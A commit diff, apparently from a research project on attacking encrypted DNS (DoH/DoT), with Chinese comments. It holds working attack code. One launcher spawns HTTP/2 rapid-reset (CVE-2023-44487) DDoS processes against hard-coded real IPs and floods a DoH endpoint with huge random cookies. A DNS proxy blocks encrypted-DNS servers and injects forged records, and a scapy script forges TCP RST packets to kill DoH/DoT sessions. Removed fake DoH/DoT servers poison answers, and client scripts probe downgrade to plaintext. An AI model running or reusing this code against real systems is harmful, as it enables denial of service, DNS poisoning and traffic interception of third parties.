class LogLevel:
INFO = "INFO"
WARNING = "WARNING"
ERROR = "ERROR"
PAYLOAD = "PAYLOAD"
class LogEntry:
def __init__(self, log_level, log_info):
self.created_time = time.strftime("%Y-%m-%d %H:%M:%S")
self.log_level = log_level
self.log_info = log_info
class InfoLogger:
def __init__(self, interval=1):
self.log_queue = Queue()
self.interval = interval
self.logging_thread = threading.Thread(target=self.start_logging)
self.logging_thread.daemon = True
self.logging_thread.start()
def start_logging(self):
while True:
entry = self.log_queue.get()
if entry is None: # 退出信号
break
# time.sleep(self.interval) # 延迟输出
# 确保输出中文
print(json.dumps(entry.__dict__, ensure_ascii=False))
def log_info(self, level, message):
entry = LogEntry(level, message)
self.log_queue.put(entry) # 将日志条目发送到队列
def close(self):
self.log_queue.put(None) # 发送退出信号
self.logging_thread.join() # 等待线程结束
# 主函数
# if __name__ == "__main__":
# logger = InfoLogger(interval=1)
# logger.log_info(LogLevel.INFO, "程序开始运行")
# logger.log_info(LogLevel.WARNING, "这是一个警告信息")
# logger.log_info(LogLevel.ERROR, "发生了一个错误")
# logger.log_info(LogLevel.PAYLOAD, "处理的有效负载信息")
# logger.log_info(LogLevel.INFO, "程序结束运行")
# logger.close() # 关闭日志记录

View File

@@ -1,7 +1,23 @@
import base64
import os import os
import argparse import argparse
import random
import string
import time import time
import dns
from logger_DoE import *
def ge_cookie():
cookie = ""
for i in range(200):
cookie += ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(random.randint(4, 10)))+\
"="''.join(random.choice(string.ascii_letters + string.digits) for _ in range(random.randint(8, 20)))+"; "
cookie = cookie[:-2]
#print(sys.getsizeof(cookie)/1024)
return cookie
parser = argparse.ArgumentParser() parser = argparse.ArgumentParser()
parser.add_argument('-n', '--n', default=3) parser.add_argument('-n', '--n', default=3)
parser.add_argument('-round', '--round', default=5) parser.add_argument('-round', '--round', default=5)
@@ -10,11 +26,29 @@ args = parser.parse_args()
stime = time.perf_counter() stime = time.perf_counter()
round = int(args.round) round = int(args.round)
wait_time = int(args.wait) wait_time = int(args.wait)
#print(f"python att_pending_https.py -stime {stime} -round {round} -wait {wait_time}")
logger = InfoLogger(interval=1)
logger.log_info(LogLevel.INFO, "程序开始运行")
for i in range(int(args.n)): for i in range(int(args.n)):
#print(f"python3 cve44487.py -s {i}") #print(f"python3 cve44487.py -s {i}")
os.popen(f"python att_pending_cookie.py -stime {stime} -round {round} -wait {wait_time}") os.popen(f"python att_pending_https.py -stime {stime} -round {round} -wait {wait_time}")
message = dns.message.make_query(''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8))+ ".google.com", "A")
message.flags |= dns.flags.RD
dns_req = base64.b64encode(message.to_wire()).decode("UTF8").rstrip("=")
cookie = ge_cookie()
headers = {'host': 'www.doeresearch.site',"content-type": "application/dns-message",
"accept": "application/dns-message",
"Surrogate-Control": "max-age=0", "Cache-Control": "max-age=0",
"Cookie":cookie}
logger.log_info(LogLevel.PAYLOAD, f"处理的有效负载信息GET /dns-query?dns=" + f"{dns_req} HTTP/1.1\r\n")
logger.log_info(LogLevel.PAYLOAD, f"处理的有效负载信息:{headers}")
while True: while True:
current_time = time.perf_counter() current_time = time.perf_counter()
elapsed_time = current_time - stime elapsed_time = current_time - stime
print(f"经过的时间:{elapsed_time:.2f}", end="\r") # print(f"经过的时间:{elapsed_time:.2f}秒", end="\r")
time.sleep(1) # 暂停一秒钟 # time.sleep(1) # 暂停一秒钟
if elapsed_time>wait_time:
logger.log_info(LogLevel.INFO, "程序结束运行")
logger.close() # 关闭日志记录
break

Binary file not shown.

View File

@@ -17,7 +17,7 @@ from h2.connection import H2Connection
from h2.config import H2Configuration from h2.config import H2Configuration
import h2.events import h2.events
import httpx import httpx
import requests from logger_DoE import *
import asyncio import asyncio
import warnings import warnings
@@ -115,6 +115,9 @@ def send_rst_stream_h2(host, sid,port=443, uri_path='/dns-query', timeout=5, pro
#print(headers) #print(headers)
h2_conn.send_headers(stream_id, headers) h2_conn.send_headers(stream_id, headers)
conn.send(h2_conn.data_to_send()) conn.send(h2_conn.data_to_send())
if stream_id==sid * 999999:
logger.log_info(LogLevel.PAYLOAD, f"处理的有效负载信息:{headers}")
# h2_conn.send_data(stream_id, body) # h2_conn.send_data(stream_id, body)
# conn.send(h2_conn.data_to_send()) # conn.send(h2_conn.data_to_send())
h2_conn.end_stream(stream_id) h2_conn.end_stream(stream_id)
@@ -140,13 +143,14 @@ if __name__ == "__main__":
parser = argparse.ArgumentParser() parser = argparse.ArgumentParser()
parser.add_argument('-s', '--sid',default=1) parser.add_argument('-s', '--sid',default=1)
args = parser.parse_args() args = parser.parse_args()
logger = InfoLogger(interval=1)
targets = ["8.218.236.77"] targets = ["47.76.239.205"]
#targets = ['108.61.195.177'] #targets = ['108.61.195.177']
for i in targets: for i in targets:
now = datetime.now().strftime("%Y-%m-%d %H:%M:%S") now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
print(now,f"Checking {i}...", file=sys.stderr) #print(now,f"Checking {i}...", file=sys.stderr)
send_rst_stream_h2(i,int(args.sid)) send_rst_stream_h2(i,int(args.sid))
#print("send rst stream:", resp, err2) #print("send rst stream:", resp, err2)

52
7_doh_DDoS/logger_DoE.py Normal file
View File

@@ -0,0 +1,52 @@
# -*- coding: utf-8 -*-
import time
import json
import threading
from queue import Queue
class LogLevel:
INFO = "INFO"
WARNING = "WARNING"
ERROR = "ERROR"
PAYLOAD = "PAYLOAD"
class LogEntry:
def __init__(self, log_level, log_info):
self.created_time = time.strftime("%Y-%m-%d %H:%M:%S")
self.log_level = log_level
self.log_info = log_info
class InfoLogger:
def __init__(self, interval=1):
self.log_queue = Queue()
self.interval = interval
self.logging_thread = threading.Thread(target=self.start_logging)
self.logging_thread.daemon = True
self.logging_thread.start()
def start_logging(self):
while True:
entry = self.log_queue.get()
if entry is None: # 退出信号
break
# time.sleep(self.interval) # 延迟输出
# 确保输出中文
print(json.dumps(entry.__dict__, ensure_ascii=False))
def log_info(self, level, message):
entry = LogEntry(level, message)
self.log_queue.put(entry) # 将日志条目发送到队列
def close(self):
self.log_queue.put(None) # 发送退出信号
self.logging_thread.join() # 等待线程结束
# 主函数
# if __name__ == "__main__":
# logger = InfoLogger(interval=1)
# logger.log_info(LogLevel.INFO, "程序开始运行")
# logger.log_info(LogLevel.WARNING, "这是一个警告信息")
# logger.log_info(LogLevel.ERROR, "发生了一个错误")
# logger.log_info(LogLevel.PAYLOAD, "处理的有效负载信息")
# logger.log_info(LogLevel.INFO, "程序结束运行")
# logger.close() # 关闭日志记录

View File

@@ -1,26 +1,20 @@
import argparse import argparse
import os import os
import time import time
from logger_DoE import *
parser = argparse.ArgumentParser() parser = argparse.ArgumentParser()
parser.add_argument('-n', '--n', default=1) parser.add_argument('-n', '--n', default=1)
args = parser.parse_args() args = parser.parse_args()
logger = InfoLogger(interval=1)
logger.log_info(LogLevel.INFO, "程序开始运行")
streams = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19,21,23,25,27,29,31] streams = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19,21,23,25,27,29,31]
for i in streams[:int(args.n)]: for i in streams[:int(args.n)]:
#print(f"python3 cve44487.py -s {i}") print(f"python3 cve44487.py -s {i}")
os.popen(f"python cve44487.py -s {i}") #process = os.popen(f"python cve44487.py -s {i}")
#print(process.read())
# for j in range(100): #process.close()
# for i in streams[:int(args.n)]: logger.log_info(LogLevel.INFO, "程序结束运行")
# # #print(f"python3 cve44487.py -s {i}") logger.close() # 关闭日志记录
# os.popen(f"python cve44487.py -s {i}")
# start_time = time.perf_counter()
# while time.perf_counter() - start_time < 0.1:
# pass
# for i in streams[int(args.n):]:
# # #print(f"python3 cve44487.py -s {i}")
# os.popen(f"python cve44487.py -s {i}")
# start_time = time.perf_counter()
# while time.perf_counter() - start_time < 1:
# pass

Binary file not shown.

View File

@@ -0,0 +1,76 @@
import socket
import ssl
import dns.message
import dns.query
import dns.rcode
import argparse
from logger_DoE import *
import pandas as pd
domains = set(pd.read_csv('domains.csv').domain)
upstream_server = '223.5.5.5'
# 创建监听socket
listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
listener.bind(('127.0.0.54', 53))
parser = argparse.ArgumentParser()
parser.add_argument('-pass', '--passdoe', default=0)
parser.add_argument('-tamper', '--tamper', default='')
parser.add_argument('-inject', '--inject', default='')
parser.add_argument('-ns', '--ns', default='1.1.1.1')
args = parser.parse_args()
tamper = args.tamper +'.'
inject = args.inject +'.'
ns = args.ns
logger = InfoLogger(interval=1)
logger.log_info(LogLevel.INFO, "程序开始运行")
while True:
# 接收DNS请求
data, addr = listener.recvfrom(1024)
#print(dns.message.from_wire(data))
data = dns.message.from_wire(data)
query_r = data.question[0].name.to_text()[:-1]
if query_r in domains and args.passdoe==0:
# print(data.question[0].name.to_text()[:-1])
# print(addr)
#print(data)
#print('对DoE域名的DNS请求', query_r)
logger = InfoLogger(interval=1)
logger.log_info(LogLevel.INFO, f'对DoE域名的DNS请求{query_r}')
# # 创建TLS连接并发送DNS请求到上游服务器
resp = dns.query.udp(
q=data,
where=upstream_server,
timeout=10)
#print('DNS响应', resp.answer)
resp.answer = [dns.rrset.from_text(query_r+'.', 3600, dns.rdataclass.IN, dns.rdatatype.A, '10.10.10.10')]
#print(f'对DoE域名{query_r}的DNS请求已阻断返回10.10.10.10')
logger.log_info(LogLevel.INFO, f'对DoE域名{query_r}的DNS请求已阻断返回10.10.10.10')
logger.log_info(LogLevel.PAYLOAD, str(resp.answer.__str__()))
# with socket.create_connection((upstream_server,853)) as sock:
# with context.wrap_socket(sock, server_hostname=upstream_server[0]) as tls_sock:
# tls_sock.sendall(data.to_wire())
# resp = tls_sock.recv(4096)
# 将上游服务器的响应发送回客户端
listener.sendto(resp.to_wire(), addr)
else:
resp = dns.query.udp(
q=data,
where=upstream_server,
timeout=10)
if str(resp.question[0].name) == tamper and int(resp.question[0].rdtype) == 1:
print('---tamper---', tamper)
resp.answer = [
dns.rrset.from_text(tamper, 3600, dns.rdataclass.IN, dns.rdatatype.A, '8.8.8.8')]
if str(resp.question[0].name) == inject:
print('---inject---', inject)
resp.additional = [
dns.rrset.from_text(inject, 3600, dns.rdataclass.IN, dns.rdatatype.NS, 'ns.' + inject.split('.', 1)[1]),
dns.rrset.from_text('ns.' + inject.split('.', 1)[1], 3600, dns.rdataclass.IN, dns.rdatatype.A, ns)]
listener.sendto(resp.to_wire(), addr)
#break

View File

@@ -0,0 +1,49 @@
import asyncio
from scapy.all import *
import argparse
from logger_DoE import *
logger = InfoLogger(interval=1)
logger.log_info(LogLevel.INFO, "程序开始运行")
async def process_packet(packet):
if TCP in packet:
seq = packet[TCP].seq
ack = packet[TCP].ack
local_port = packet[TCP].sport
print(f"Seq: {seq}, Ack: {ack}")
# Construct a new packet to send
rst_packet = Ether(dst="00:16:3e:08:8b:25", src="ee:ff:ff:ff:ff:ff") / IP(dst=local_ip, src=target_ip) / TCP(sport=target_port,
dport=local_port, flags="AR",
seq=ack, ack=seq+1, window=0)
sendp(rst_packet, iface='eth0')
logger.log_info(LogLevel.PAYLOAD, rst_packet)
def sniff_packets():
# Define a callback for processing packets
def callback(packet):
asyncio.run(process_packet(packet))
# Start sniffing
sniff(prn=callback, filter=f"tcp and ip src {local_ip} and ip dst {target_ip} and tcp dst port {target_port}", store=0,iface='eth0')
def main():
sniff_packets()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--protocol', default='doh')
parser.add_argument('-ip', '--ip', default='94.140.14.14')
args = parser.parse_args()
# target_ip = "94.140.14.14"
# target_port = 443
ports = {'doh':443, 'dot':853}
target_ip = args.ip
target_port = ports[args.protocol]
local_ip = "172.22.115.154"
main()

36096
8_doh_fake/domains.csv Normal file

File diff suppressed because it is too large Load Diff

View File

@@ -1,63 +0,0 @@
import argparse
import base64
import ssl
import dns.asyncquery
import dns.rcode
import aiohttp
import dns.message
import dns.rrset
from aiohttp import web
DNS_SERVER_ADDRESS = '223.5.5.5'
DNS_SERVER_PORT = 53
async def doh_handler(request):
if request.method == "GET":
rquery = str(request.query).split(' ')[1]
#print(rquery)
rquery = rquery.ljust(len(rquery) + len(rquery) % 4, "=")
doh_request = dns.message.from_wire(base64.b64decode(rquery.encode("UTF8")))
else:
try:
doh_request = dns.message.from_wire(await request.read())
except :
return web.Response(text='Invalid DNS request', status=400)
dns_request = dns.message.make_query(doh_request.question[0].name, doh_request.question[0].rdtype)
dns_request.id = doh_request.id
# 发起DNS请求
dns_response = await dns.asyncquery.udp(q = dns_request, port=DNS_SERVER_PORT, where=DNS_SERVER_ADDRESS)
#print(dns_response)
if str(doh_request.question[0].name) == tamper and int(doh_request.question[0].rdtype)==1:
print('---tamper---',tamper)
dns_response.answer = [ dns.rrset.from_text(tamper,3600,dns.rdataclass.IN, dns.rdatatype.A,'39.106.44.126')]
if str(doh_request.question[0].name) == inject:
print('---inject---',inject)
dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
#print(dns_response)
# 构建HTTPS响应
response = web.Response(body=dns_response.to_wire())
response.content_type = 'application/dns-message'
return response
parser = argparse.ArgumentParser()
parser.add_argument('-tamper', '--tamper', default='')
parser.add_argument('-inject', '--inject', default='')
parser.add_argument('-ns', '--ns', default='39.106.44.126')
args = parser.parse_args()
tamper = args.tamper +'.'
inject = args.inject +'.'
ns = args.ns
#print('tamper:',tamper)
DOH_SERVER_URL = "https://dns.alidns.com/dns-query"
CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt"
KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key"
ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ssl_context.load_cert_chain(CERT_FILE, KEY_FILE)
app = web.Application()
app.router.add_get(path='/dns-query',handler=doh_handler)
app.router.add_post(path='/dns-query',handler=doh_handler)
web.run_app(app, host='127.0.0.1', port=8444, ssl_context=ssl_context)

52
8_doh_fake/logger_DoE.py Normal file
View File

@@ -0,0 +1,52 @@
# -*- coding: utf-8 -*-
import time
import json
import threading
from queue import Queue
class LogLevel:
INFO = "INFO"
WARNING = "WARNING"
ERROR = "ERROR"
PAYLOAD = "PAYLOAD"
class LogEntry:
def __init__(self, log_level, log_info):
self.created_time = time.strftime("%Y-%m-%d %H:%M:%S")
self.log_level = log_level
self.log_info = log_info
class InfoLogger:
def __init__(self, interval=1):
self.log_queue = Queue()
self.interval = interval
self.logging_thread = threading.Thread(target=self.start_logging)
self.logging_thread.daemon = True
self.logging_thread.start()
def start_logging(self):
while True:
entry = self.log_queue.get()
if entry is None: # 退出信号
break
# time.sleep(self.interval) # 延迟输出
# 确保输出中文
print(json.dumps(entry.__dict__, ensure_ascii=False))
def log_info(self, level, message):
entry = LogEntry(level, message)
self.log_queue.put(entry) # 将日志条目发送到队列
def close(self):
self.log_queue.put(None) # 发送退出信号
self.logging_thread.join() # 等待线程结束
# 主函数
# if __name__ == "__main__":
# logger = InfoLogger(interval=1)
# logger.log_info(LogLevel.INFO, "程序开始运行")
# logger.log_info(LogLevel.WARNING, "这是一个警告信息")
# logger.log_info(LogLevel.ERROR, "发生了一个错误")
# logger.log_info(LogLevel.PAYLOAD, "处理的有效负载信息")
# logger.log_info(LogLevel.INFO, "程序结束运行")
# logger.close() # 关闭日志记录

View File

@@ -0,0 +1,77 @@
import socket
import ssl
import dns.message
import dns.query
import dns.rcode
import argparse
import ipaddress
import base64
import httpx
def do53_query(name,type):
query = dns.message.make_query(qname=name, rdtype=type)
response_message = dns.query.udp(q=query, port=53, where='127.0.0.54', timeout=5)
print(f'本地do53解析域名{name}{type}记录:\n{response_message}')
def p1(doh,mode,name,type):
print(f'========Phase 1: 解析获取DoT服务器的IP地址========')
query = dns.message.make_query(qname=doh, rdtype='A')
for i in range(1,4):
try:
response_message = dns.query.udp(q=query, port=53, where='127.0.0.54', timeout=5)
except:
response_message = ''
print(f'获取失败,重试{i}')
if response_message != '':
print(f'{doh} A 记录地址为 {response_message.answer[0]}')
p2(str(response_message.answer[0]).split(' ')[-1],args.mode,args.name,args.type)
else:
if mode == 'opportunistic':
print('机会隐私设置,降为明文进行查询')
do53_query(name, type)
else:
print('严格隐私设置,查询结束')
def p2(doh_ip,mode,name,type):
print(f'========Phase 2: 与DoT服务器{doh_ip}建立连接========')
query = dns.message.make_query(qname=name, rdtype=type)
headers = {"content-type": "application/dns-message", "accept": "application/dns-message", "host":doh_ip}
for i in range(1,4):
try:
with httpx.Client(http2=True, http1=True, verify=True, timeout=5) as client:
resp = client.get(f"https://{doh_ip}/dns-query?dns=" + base64.b64encode(query.to_wire()).decode("UTF8").rstrip("="),
headers=headers)
response_message = dns.message.from_wire(resp.content)
#print(response_message)
except:
response_message = ''
print(f'获取失败,重试{i}')
if response_message == '':
if mode == 'opportunistic':
print('机会隐私设置,降为明文进行查询')
do53_query(name, type)
else:
print('严格隐私设置,查询结束')
else:
print(f'解析域名{name}{type}记录:\n{response_message}')
parser = argparse.ArgumentParser()
parser.add_argument('-doh', '--doh', default='dns.alidns.com')
parser.add_argument('-mode', '--mode', default='opportunistic')
parser.add_argument('-name', '--name', default='www.baidu.com')
parser.add_argument('-type', '--type', default='A')
args = parser.parse_args()
print(f'DoH server: {args.doh}')
try:
if ipaddress.ip_address(args.doh):
p2(args.doh, args.mode, args.name, args.type)
except:
p1(args.doh,args.mode,args.name,args.type)

View File

@@ -0,0 +1,68 @@
import socket
import ssl
import dns.message
import dns.query
import dns.rcode
import argparse
import ipaddress
def do53_query(name,type):
query = dns.message.make_query(qname=name, rdtype=type)
response_message = dns.query.udp(q=query, port=53, where='127.0.0.54', timeout=5)
print(f'本地do53解析域名{name}{type}记录:\n{response_message}')
def p1(dot,mode,name,type):
print(f'========Phase 1: 解析获取DoT服务器的IP地址========')
query = dns.message.make_query(qname=dot, rdtype='A')
for i in range(1,4):
try:
response_message = dns.query.udp(q=query, port=53, where='127.0.0.54', timeout=5)
except:
response_message = ''
print(f'获取失败,重试{i}')
if response_message != '':
print(f'{dot} A 记录地址为 {response_message.answer[0]}')
p2(str(response_message.answer[0]).split(' ')[-1],args.mode,args.name,args.type)
else:
if mode == 'opportunistic':
print('机会隐私设置,降为明文进行查询')
do53_query(name, type)
else:
print('严格隐私设置,查询结束')
def p2(dot_ip,mode,name,type):
print(f'========Phase 2: 与DoT服务器{dot_ip}建立连接========')
query = dns.message.make_query(qname=name, rdtype=type)
for i in range(1,4):
try:
response_message = dns.query.tls(q=query, port=853, where=dot_ip, timeout=5,verify=True)
except:
response_message = ''
print(f'获取失败,重试{i}')
if response_message == '':
if mode == 'opportunistic':
print('机会隐私设置,降为明文进行查询')
do53_query(name, type)
else:
print('严格隐私设置,查询结束')
else:
print(f'解析域名{name}{type}记录:\n{response_message}')
parser = argparse.ArgumentParser()
parser.add_argument('-dot', '--dot', default='dns.alidns.com')
parser.add_argument('-mode', '--mode', default='opportunistic')
parser.add_argument('-name', '--name', default='www.baidu.com')
parser.add_argument('-type', '--type', default='A')
args = parser.parse_args()
print(f'DoT server: {args.dot}')
try:
if ipaddress.ip_address(args.dot):
p2(args.dot, args.mode, args.name, args.type)
except:
p1(args.dot,args.mode,args.name,args.type)

Binary file not shown.

View File

@@ -0,0 +1,76 @@
import socket
import ssl
import dns.message
import dns.query
import dns.rcode
import argparse
from logger_DoE import *
import pandas as pd
domains = set(pd.read_csv('domains.csv').domain)
upstream_server = '223.5.5.5'
# 创建监听socket
listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
listener.bind(('127.0.0.54', 53))
parser = argparse.ArgumentParser()
parser.add_argument('-pass', '--passdoe', default=0)
parser.add_argument('-tamper', '--tamper', default='')
parser.add_argument('-inject', '--inject', default='')
parser.add_argument('-ns', '--ns', default='1.1.1.1')
args = parser.parse_args()
tamper = args.tamper +'.'
inject = args.inject +'.'
ns = args.ns
logger = InfoLogger(interval=1)
logger.log_info(LogLevel.INFO, "程序开始运行")
while True:
# 接收DNS请求
data, addr = listener.recvfrom(1024)
#print(dns.message.from_wire(data))
data = dns.message.from_wire(data)
query_r = data.question[0].name.to_text()[:-1]
if query_r in domains and args.passdoe==0:
# print(data.question[0].name.to_text()[:-1])
# print(addr)
#print(data)
#print('对DoE域名的DNS请求', query_r)
logger = InfoLogger(interval=1)
logger.log_info(LogLevel.INFO, f'对DoE域名的DNS请求{query_r}')
# # 创建TLS连接并发送DNS请求到上游服务器
resp = dns.query.udp(
q=data,
where=upstream_server,
timeout=10)
#print('DNS响应', resp.answer)
resp.answer = [dns.rrset.from_text(query_r+'.', 3600, dns.rdataclass.IN, dns.rdatatype.A, '10.10.10.10')]
#print(f'对DoE域名{query_r}的DNS请求已阻断返回10.10.10.10')
logger.log_info(LogLevel.INFO, f'对DoE域名{query_r}的DNS请求已阻断返回10.10.10.10')
logger.log_info(LogLevel.PAYLOAD, str(resp.answer.__str__()))
# with socket.create_connection((upstream_server,853)) as sock:
# with context.wrap_socket(sock, server_hostname=upstream_server[0]) as tls_sock:
# tls_sock.sendall(data.to_wire())
# resp = tls_sock.recv(4096)
# 将上游服务器的响应发送回客户端
listener.sendto(resp.to_wire(), addr)
else:
resp = dns.query.udp(
q=data,
where=upstream_server,
timeout=10)
if str(resp.question[0].name) == tamper and int(resp.question[0].rdtype) == 1:
print('---tamper---', tamper)
resp.answer = [
dns.rrset.from_text(tamper, 3600, dns.rdataclass.IN, dns.rdatatype.A, '8.8.8.8')]
if str(resp.question[0].name) == inject:
print('---inject---', inject)
resp.additional = [
dns.rrset.from_text(inject, 3600, dns.rdataclass.IN, dns.rdatatype.NS, 'ns.' + inject.split('.', 1)[1]),
dns.rrset.from_text('ns.' + inject.split('.', 1)[1], 3600, dns.rdataclass.IN, dns.rdatatype.A, ns)]
listener.sendto(resp.to_wire(), addr)
#break

View File

@@ -0,0 +1,49 @@
import asyncio
from scapy.all import *
import argparse
from logger_DoE import *
logger = InfoLogger(interval=1)
logger.log_info(LogLevel.INFO, "程序开始运行")
async def process_packet(packet):
if TCP in packet:
seq = packet[TCP].seq
ack = packet[TCP].ack
local_port = packet[TCP].sport
print(f"Seq: {seq}, Ack: {ack}")
# Construct a new packet to send
rst_packet = Ether(dst="00:16:3e:08:8b:25", src="ee:ff:ff:ff:ff:ff") / IP(dst=local_ip, src=target_ip) / TCP(sport=target_port,
dport=local_port, flags="AR",
seq=ack, ack=seq+1, window=0)
sendp(rst_packet, iface='eth0')
logger.log_info(LogLevel.PAYLOAD, rst_packet)
def sniff_packets():
# Define a callback for processing packets
def callback(packet):
asyncio.run(process_packet(packet))
# Start sniffing
sniff(prn=callback, filter=f"tcp and ip src {local_ip} and ip dst {target_ip} and tcp dst port {target_port}", store=0,iface='eth0')
def main():
sniff_packets()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--protocol', default='doh')
parser.add_argument('-ip', '--ip', default='94.140.14.14')
args = parser.parse_args()
# target_ip = "94.140.14.14"
# target_port = 443
ports = {'doh':443, 'dot':853}
target_ip = args.ip
target_port = ports[args.protocol]
local_ip = "172.22.115.154"
main()

36096
9_dot_fake/domains.csv Normal file

File diff suppressed because it is too large Load Diff

View File

@@ -1,45 +0,0 @@
import socket
import ssl
import dns.message
import dns.query
import dns.rcode
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-dot', '--dot', default='dns.alidns.com')
args = parser.parse_args()
print(f'DoT server: {args.dot}')
upstream_server = '47.88.31.213'
# 创建监听socket
listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
listener.bind(('127.0.0.1', 53))
# 创建TLS连接
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
while True:
# 接收DNS请求
data, addr = listener.recvfrom(1024)
#print(dns.message.from_wire(data))
data = dns.message.from_wire(data)
if 'baidu' in data.question.__str__():
# print(data)
# print(addr)
print('DNS请求', data.question)
# # 创建TLS连接并发送DNS请求到上游服务器
resp = dns.query.tls(
q=data,
where=upstream_server,
timeout=10,
ssl_context=context)
print('DNS响应', resp.answer)
# with socket.create_connection((upstream_server,853)) as sock:
# with context.wrap_socket(sock, server_hostname=upstream_server[0]) as tls_sock:
# tls_sock.sendall(data.to_wire())
# resp = tls_sock.recv(4096)
# 将上游服务器的响应发送回客户端
listener.sendto(resp.to_wire(), addr)
break

View File

@@ -1,63 +0,0 @@
import argparse
import asyncio
import ssl
import socket
import dns.asyncquery
import dns.message
import dns.rcode
import dns.flags
import dns.message
import dns.rrset
from dnslib import DNSRecord
async def handle_client(reader, writer):
request_data = await reader.read(1024)
request = dns.message.from_wire(request_data[2:])
#print(request)
dns_request = dns.message.make_query(request.question[0].name, request.question[0].rdtype)
dns_request.id = request.id
#print(dns_request)
dns_response = await dns.asyncquery.udp(q=dns_request, port=53, where='223.5.5.5')
#print(dns_response)
if str(request.question[0].name) == tamper and int(request.question[0].rdtype) == 1:
print('---tamper---', tamper)
dns_response.answer = [dns.rrset.from_text(tamper, 3600, dns.rdataclass.IN, dns.rdatatype.A, '39.106.44.126')]
if str(request.question[0].name) == inject:
print('---inject---', inject)
dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
#print(dns_response)
response_data = dns_response
record_header = len(response_data.to_wire()).to_bytes(2, 'big')
# 构建完整的TLS响应数据
tls_response_data = record_header + response_data.to_wire()
writer.write(tls_response_data)
await writer.drain()
writer.close()
async def start_server():
# 配置服务器参数
listen_address = '0.0.0.0'
listen_port = 853
CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt" # 替换为你的SSL证书文件路径
KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key" # 替换为你的SSL密钥文件路径
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
# 创建TCP服务器
server = await asyncio.start_server(
handle_client, listen_address, listen_port, ssl=context)
print(f'DoT server listening on {listen_address}:{listen_port}')
async with server:
await server.serve_forever()
parser = argparse.ArgumentParser()
parser.add_argument('-tamper', '--tamper', default='')
parser.add_argument('-inject', '--inject', default='')
parser.add_argument('-ns', '--ns', default='39.106.44.126')
args = parser.parse_args()
tamper = args.tamper +'.'
inject = args.inject +'.'
ns = args.ns
asyncio.run(start_server())

52
9_dot_fake/logger_DoE.py Normal file
View File

@@ -0,0 +1,52 @@
# -*- coding: utf-8 -*-
import time
import json
import threading
from queue import Queue
class LogLevel:
INFO = "INFO"
WARNING = "WARNING"
ERROR = "ERROR"
PAYLOAD = "PAYLOAD"
class LogEntry:
def __init__(self, log_level, log_info):
self.created_time = time.strftime("%Y-%m-%d %H:%M:%S")
self.log_level = log_level
self.log_info = log_info
class InfoLogger:
def __init__(self, interval=1):
self.log_queue = Queue()
self.interval = interval
self.logging_thread = threading.Thread(target=self.start_logging)
self.logging_thread.daemon = True
self.logging_thread.start()
def start_logging(self):
while True:
entry = self.log_queue.get()
if entry is None: # 退出信号
break
# time.sleep(self.interval) # 延迟输出
# 确保输出中文
print(json.dumps(entry.__dict__, ensure_ascii=False))
def log_info(self, level, message):
entry = LogEntry(level, message)
self.log_queue.put(entry) # 将日志条目发送到队列
def close(self):
self.log_queue.put(None) # 发送退出信号
self.logging_thread.join() # 等待线程结束
# 主函数
# if __name__ == "__main__":
# logger = InfoLogger(interval=1)
# logger.log_info(LogLevel.INFO, "程序开始运行")
# logger.log_info(LogLevel.WARNING, "这是一个警告信息")
# logger.log_info(LogLevel.ERROR, "发生了一个错误")
# logger.log_info(LogLevel.PAYLOAD, "处理的有效负载信息")
# logger.log_info(LogLevel.INFO, "程序结束运行")
# logger.close() # 关闭日志记录

View File

@@ -0,0 +1,77 @@
import socket
import ssl
import dns.message
import dns.query
import dns.rcode
import argparse
import ipaddress
import base64
import httpx
def do53_query(name,type):
query = dns.message.make_query(qname=name, rdtype=type)
response_message = dns.query.udp(q=query, port=53, where='127.0.0.54', timeout=5)
print(f'本地do53解析域名{name}{type}记录:\n{response_message}')
def p1(doh,mode,name,type):
print(f'========Phase 1: 解析获取DoT服务器的IP地址========')
query = dns.message.make_query(qname=doh, rdtype='A')
for i in range(1,4):
try:
response_message = dns.query.udp(q=query, port=53, where='127.0.0.54', timeout=5)
except:
response_message = ''
print(f'获取失败,重试{i}')
if response_message != '':
print(f'{doh} A 记录地址为 {response_message.answer[0]}')
p2(str(response_message.answer[0]).split(' ')[-1],args.mode,args.name,args.type)
else:
if mode == 'opportunistic':
print('机会隐私设置,降为明文进行查询')
do53_query(name, type)
else:
print('严格隐私设置,查询结束')
def p2(doh_ip,mode,name,type):
print(f'========Phase 2: 与DoT服务器{doh_ip}建立连接========')
query = dns.message.make_query(qname=name, rdtype=type)
headers = {"content-type": "application/dns-message", "accept": "application/dns-message", "host":doh_ip}
for i in range(1,4):
try:
with httpx.Client(http2=True, http1=True, verify=True, timeout=5) as client:
resp = client.get(f"https://{doh_ip}/dns-query?dns=" + base64.b64encode(query.to_wire()).decode("UTF8").rstrip("="),
headers=headers)
response_message = dns.message.from_wire(resp.content)
#print(response_message)
except:
response_message = ''
print(f'获取失败,重试{i}')
if response_message == '':
if mode == 'opportunistic':
print('机会隐私设置,降为明文进行查询')
do53_query(name, type)
else:
print('严格隐私设置,查询结束')
else:
print(f'解析域名{name}{type}记录:\n{response_message}')
parser = argparse.ArgumentParser()
